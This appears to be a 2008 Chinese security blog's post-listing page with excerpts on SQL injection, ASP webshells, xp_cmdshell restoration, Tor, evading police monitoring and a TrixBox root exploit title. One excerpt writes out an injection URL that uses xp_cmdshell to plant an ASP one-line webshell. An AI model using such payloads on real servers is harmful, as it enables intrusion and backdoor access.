- 博客(14)
- 收藏
- 关注
RSS订阅原创 DB_owner下利用差异备份
在SQL注入中,碰到的不是SA权限是不是该放弃呢?不用。可以用备份差异拿到webshell,但是拿到webshell的前提条件必须有几个。第一,要有列目录的权限(能列目录当然不能低于DB_owner)。第二,HTTP500错误不是自定义。第三,WEB和数据在一块。还有的就是数据库中不能存在%号之类的。不然也是不成功的。第四,数据量不能太大,太大了没法在IE打开。列目录这个权限可有可无,但是
2008-08-19 12:49:00
641
1
转载 最详细的SQL注入相关的命令整理
1、 用^转义字符来写ASP(一句话木马)文件的方法:? http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell echo ^execute request^("l"^)^ >c:/mu.asp;-- ? echo ^ >c:/mu.asp2、 显示SQL系统版本: ? http://192
2008-08-18 21:13:00
635
原创 asp木马之攻与防
前言现在的系统管理员越来越强悍了,他们研究攻击者的心理,就如同攻击者研究管理员的心理一样。 0x01通常情况下,攻击者或者渗透测试人员需要检测某网络的安全性,主要从目标对外所开放的服务下手,主要是:web服务器,数据库服务器,FTP服务器以及mail服务器。而当目标网络配备有各种提高安全性的硬件设施时,比如普通硬件防火墙、抗DDOS防火墙、web应用防火墙,或者IDS、IPS,再或
2008-08-04 13:53:00
598
2
转载 xp_cmdshell的删除与恢复
扩展储存过程被删除以后可以有很简单的办法恢复:删除drop procedure sp_addextendedprocdrop procedure sp_oacreateexec sp_dropextendedproc xp_cmdshell恢复dbcc addextendedproc ("sp_oacreate","odsole70.dll")dbcc addextendedproc (
2008-07-31 14:06:00
1241
转载 用Tor实现有效且安全的互联网访问
一、为什么写?google以很有创意的推广方式推出gmail后,在国内很是热闹了一段时间,但随即大家发现,gmail似乎不如传说中的那么好用,虽然号称容量上 G,但总是动不动就弹出个对话框:“Oops...unable toreach Gmail. Please check your internet connection and tryagain.”,什么操作都是不灵光的。“什么g
2008-07-30 14:21:00
2152
1
转载 互联网没有天网恢恢疏而不漏
俗语有云:天网恢恢、疏而不漏!这句话是真的么?现实社会中我不知道。但是在互联网上,这句话在Internet上是很软弱的。读完我这篇文,就可以知道。在网络上触犯现行法律,即便于公安部门立案调查,未必就“落入法网” 注:本文仅做技术研讨,并非讨论如何在犯罪后逃脱法律的惩罚。 首先来认识一下:“网监”也就是公安部门分管网络的部门。他们负责网络监管,如网站和服务器被黑、游戏帐号装
2008-07-30 14:14:00
583
转载 linux下文件结构
/bin 二进制可执行命令 /dev 设备特殊文件 /etc 系统管理和配置文件 /etc/rc.d 启动的配置文件和脚本 /home 用户主目录的基点,比如用户user的主目录就是/home/user,可以用~user表示 /lib 标准程序设计库,又叫动态链接共享库,作用类似windows里的.dll文件 /sbin 系统管理命令,这里存放的是系统管理员使用的管理程序 /tmp 公用
2008-07-25 10:06:00
414
转载 对国内目前信息安全专家与标准的理解
反思一下当前的安全标准热:因为中国的信息安全发展目前相对落后,缺乏标准和理论体系,所以大家都把眼光投到国外,于是从Rainbows 到CC,从bs7799到iso13335 ,SSE -CMM,IATF从NIST到GAO,NSA,到ITSM,ITIL,BS15000,以及英国的 ,加拿大的,澳大利亚的 ...,一时间大家纷纷大谈标准,以及各种基于标准的认证,尤其是在安全服务领域,有一部分人还对各
2008-07-25 10:03:00
947
1
转载 网络渗透测试无法告诉你的东西
在安全管理领域,最神秘的事情之一就是入侵者的行为方式。入侵者会做什么事情?以及他们是如何来做的?同所有重大的秘密一样,它也让许多人产生了浓厚的兴趣,同时也解释了关于实际网络攻击的书籍和教程大受欢迎的原因。如果你不具备所有正当访问权限的话,抛开违反法律不谈,对网络进行攻击可能令人乐趣无穷并且增长见识,然而事实却是,我们当中的绝大多数人并不需要知道如何去进行攻击。坦率地说,成为一名优秀的渗透测试人员
2008-07-25 10:01:00
469
转载 木桶新理论与信息安全
1、传统木桶理论 说到木桶理论,可谓众所周知:一个由许多块长短不同的木板箍成的木桶,决定其容水量大小的并非是其中最长的那块木板或全部木板长度的平均值,而是取决于其中最短的那块木板。要想提高木桶整体效应,不是增加最长的那块木板的长度,而是要下功夫补齐最短的那块木板的长度。这个理论由谁提出,目前已经无从考究了,但是这个理论的应用范围却是十分广泛,从经济学、企业管理到人力资源到个人发展。 同样这
2008-07-25 09:56:00
682
转载 风险评估杂谈
我个人觉得作为一个优秀的服务团队必须具备如下的一下基本要求也是我们尽量要给用户展示的实力。1 、需要先进的方法论信息安全风险评估基础是风险量化所有的计算都是数学模型,所以风险评估的方法论就显得尤为重要了再好的团队。如果你的方法论错了,那你拥有在先进的技术,其结果一定是错误的。作为一个专业的安全服务公司你必须要有自己明确的风险评估的方法论,并且提出他的合理性。通俗的讲,就是风险是如何构成,影响风险
2008-07-25 09:50:00
402
原创 TrixBox 2.6.1 langChoice remote root exploit
# TrixBox 2.6.1 langChoice remote root exploit# muts from offensive-security.com# chris from offensive-security.com# All credits to Jean-Michel BESNARD # Same same, but different.# http://ww
2008-07-18 22:44:00
442
原创 Begin to learn python
Sorry, there are some problems of my IME, I have to write this article in english.Beause of the need of my work, I have to learn python tonight and to write a program with python.Thats why I writ
2008-07-06 22:53:00
272
原创 浅析个人主机安全加固及数据在移动过程中的数字签名
作为一名信息安全行业的从业者,个人的安全意识尤为重要,无论是从事渗透测试,还是从事安全软件的开发,或是安全技术和安全漏洞的研究,个人电脑的安全性都一定要提高到一个相对较高的位置。 下面就我个人的一些经验来浅析一下应该从哪几个方面对个人电脑进行安全加固,从最大程度上降低自己被攻击以至于机密信息或个人资料被泄露的风险。 由于我对MAC OS以及L
2008-07-05 12:51:00
408
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人